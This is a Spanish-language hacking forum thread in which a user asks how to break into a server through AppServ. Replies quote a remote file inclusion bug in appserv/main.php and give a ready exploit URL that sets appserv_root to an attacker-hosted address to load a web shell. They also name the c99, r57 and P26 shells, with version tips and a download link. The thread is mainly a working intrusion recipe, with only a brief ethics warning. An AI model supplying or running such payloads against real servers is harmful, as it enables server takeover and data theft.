hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
06 de Octubre de 2008, 06:31:07
Noticias: La segunda fase del torneo de matemáticas ya ha empezado!!
Para ver este enlace Registrate o Inicia Sesion
ver

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Bugs y Exploits (Moderador: vengador de las sombras)
| | |-+  Como entrar via appserv [explotar vulneravilidades en appserv]
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Como entrar via appserv [explotar vulneravilidades en appserv]  (Leído 3856 veces)
Sidius
Recien llegado
*
Desconectado Desconectado

Mensajes: 4


Ver Perfil
« : 07 de Noviembre de 2006, 09:15:55 »

bueno les cuento quisiera saver como entrar a un server en realidad es un pc ke es usado como server el se ke hay unas formas de entrar atraves del appserv pero nose como  pregunte a algunos conocidos y me dijeron ke posteara jeje
bueno si alguien me da algunas info Gracias
encontre algunas info nose si serviran o mas que nada no se como usarlas
======================================================================

[ The bug ]

This in the directory appserv, file main.php:

======================================================================

include("$appserv_root/lang-english.php");

And another inclusion ( include("$appserv_root/lang-thai.php"); ), but with the same variable

======================================================================

[ Exploit ]

http://[target]/appserv/main.php?appserv_root=http://[attacker]/

======================================================================
« Última modificación: 09 de Noviembre de 2006, 10:22:42 por Sidius » En línea
OzX
Visitante
« Respuesta #1 : 09 de Noviembre de 2006, 03:00:23 »

mmm mira como es include() hace referencia a un RFI, remote file inclucion.

[ el bug ]
El directorio vulnerable es , main.php
===========================================================
include("$appserv_root/lang-english.php");
y otra inclucion ( include("$appserv_root/lang-thai.php"); ) pero con la misma varible.

=============================================================
exploit

http://[sitioweb]//appserv/main.php?appserv_root=http://shell

XD¡

si veo esta web
Para ver este enlace Registrate o Inicia Sesion es bajada o cambiad ale aviso al admin, no sean lammer y aprende para saber como funcionan las cosas, no para joder a quien tiene un server de un juego.

ayudo a personas que kieran aprender no a lamercillos que kierne joder a alguien a quien le tienen envidia.

grax
adios.

mod OzX

En línea
Sidius
Recien llegado
*
Desconectado Desconectado

Mensajes: 4


Ver Perfil
« Respuesta #2 : 09 de Noviembre de 2006, 08:25:59 »

el server es mio ¬¬ =( kiero aprender de eso  pero no para joder ..... ¬¬
En línea
OzX
Visitante
« Respuesta #3 : 09 de Noviembre de 2006, 08:57:54 »

jwjawjwa XD¡ bueno esta esta bien.

od: lo digo porque muchos llegan diciendo mensajes subliminales.. de kieren que le hackeen cierta pag de juegos..
En línea
Sidius
Recien llegado
*
Desconectado Desconectado

Mensajes: 4


Ver Perfil
« Respuesta #4 : 09 de Noviembre de 2006, 10:21:06 »

podrias explicarme eso plz y lo de la shell buske en el foro pero como ke no me keda claro lo de la shell
En línea
OzX
Visitante
« Respuesta #5 : 10 de Noviembre de 2006, 01:34:52 »

la shell es un programa pro decirlo asi, que la mayoria esta en php o txt, bueno se les puede cambiar la extencion que uno puede tomar el control del servidor inyectando esa shell, RFI.

ahy buena info en internet sobre el tema si le das el tiempo de buscas SHELL RFI en internet seguro que encontraras...
En línea
Sidius
Recien llegado
*
Desconectado Desconectado

Mensajes: 4


Ver Perfil
« Respuesta #6 : 10 de Noviembre de 2006, 10:08:25 »

Gracias me aclaraste bastante ... Smiley
En línea
Kaos007
NZ1
*
Desconectado Desconectado

Mensajes: 53


Member, pOrtal HAcker


Ver Perfil
« Respuesta #7 : 10 de Noviembre de 2006, 11:17:56 »

que tipo de shell serviria para el appserv??

yo solo tngo la c99 y la r57 pero no se si funcionen esas..

es una humilde pregunta xD! Cheesy

y me he estado bajando las revistras hackxcrack Cheesy ya estoy listo para leerlas =D

Adew
En línea

OzX
Visitante
« Respuesta #8 : 10 de Noviembre de 2006, 11:54:28 »

no tengo idea habria que provar..
miren por aka
las k salga shell

Para ver este enlace Registrate o Inicia Sesion
http://usuarios.lycos.es/yashirahackersteam/War/
En línea
CiberPunk
NZ2
**
Desconectado Desconectado

Mensajes: 336


Asm & C/C++


Ver Perfil
« Respuesta #9 : 11 de Noviembre de 2006, 04:19:36 »

Una shell como las expuestas funciona  a la perfeccion.

Solo a veces no funciona estas shells por que son versiones anteriores  bueno las ultimas versiones hasta ahora son:

C99.TXT --- #16 (version 16)
r57shell.txt --- # 1.3 (verion en beta por RST)
P26shell.txt --- ? pero es la mas recomendad.

Ahora si no funcionan ya es por ke la web esta personalizada y por lo tanto no afecta a la variable vulnerable.

Greetings:::
« Última modificación: 11 de Noviembre de 2006, 04:20:41 por CiberPunk » En línea

if stdio.h then printf(" Hello World\n");
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online